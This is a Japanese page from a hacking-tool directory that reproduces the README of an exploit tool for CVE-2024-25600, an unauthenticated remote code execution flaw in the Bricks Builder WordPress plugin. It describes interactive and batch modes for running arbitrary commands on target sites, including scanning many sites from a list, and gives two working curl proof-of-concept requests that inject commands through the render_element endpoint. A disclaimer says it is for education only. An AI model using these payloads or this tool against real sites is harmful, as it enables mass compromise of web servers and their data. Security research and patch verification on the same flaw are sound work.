Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/tornad0007/cve-2024-25600-bricks-builder-plugin-for-wordpress
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubtornad0007/cve-2024-25600-bricks-builder-plugin-for-wordpress

CVE-2024-25600-Bricks-Builder-plugin-for-WordPress

このツールは、WordPress用Bricks Builderプラグインで見つかったCVE-2024-25600の脆弱性を悪用するために設計されています。この脆弱性により、影響を受けるウェブサイト上で未認証のリモートコード実行が可能になります。このツールは、nonceを取得し、特別に細工されたリクエストを送信して任意のコマンドを実行することで、悪用プロセスを自動化します。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
92年前未レビュー

CVE-2024-25600 エクスプロイトツール 🚀

説明 📝

このツール 🛠️ は、WordPress 用の Bricks Builder プラグインに存在する CVE-2024-25600 の脆弱性 🕳️ を悪用するために設計されています。この脆弱性により、影響を受けるウェブサイト 💻 では、認証なしでリモートからコードが実行される可能性があります。このツールは、nonce を取得し、特別に細工したリクエストを送信して任意のコマンドを実行することで、悪用プロセスを自動化します。

機能 🌟

  • インタラクティブモード: ターゲットウェブサイトとリアルタイムで対話します 🕹️。
  • バッチモード: リストから複数のウェブサイトをスキャンして悪用します 📋。
  • コマンド実行: ターゲットサーバー上で任意のコマンドを実行します ⚙️。

インストール 🛠️

  1. git clone を使用して、このリポジトリをローカルマシン 🖥️ にクローンします。
  2. クローンしたリポジトリのディレクトリに移動します。
  3. pip install -r requirements.txt を使用して、必要な Python ライブラリをインストールします。

使用方法 📖

インタラクティブモード 🎮

  1. python exploit.py -u <URL> でツールを実行して、インタラクティブモードを開始します。
  2. 画面上のプロンプトに従って、ターゲットサーバーにコマンドを送信します。

バッチモード 📊

  1. ターゲット URL のリストを含むテキストファイルを準備します。
  2. python exploit.py -l <file_path> でツールを実行して、リストされたサイトをスキャンして悪用します。

概念実証 (PoC) 📝

開示で提供された基本 PoC は次のとおりです:

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

更新: 2 つ目の PoC (より信頼性が高い)

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

追加のペイロードを使用すると、より良い結果が得られる可能性があります。私のエクスプロイトや概念実証が機能しない場合は、より効果的な解決策を見つけるために、代替ペイロードを試してみることをお勧めします。

[HOST] をターゲットウェブサイトに、[NONCE] をサイトから取得した nonce 値に置き換えてください。

参考 📖

CVE-2024-25600 の脆弱性の詳細については、Snicco.io の詳細な開示を参照してください。

免責事項 ⚠️

この README で提供される情報は、教育目的のみを対象としています。ウェブサイトやネットワークへの不正なハッキングは、違法かつ非倫理的です。🚫

謝辞 🙏

この脆弱性を発見して報告し、コミュニティにウェブアプリケーションのセキュリティ強化に役立つ情報とツールを提供してくれたセキュリティ研究者に敬意を表します。

ツールをダウンロード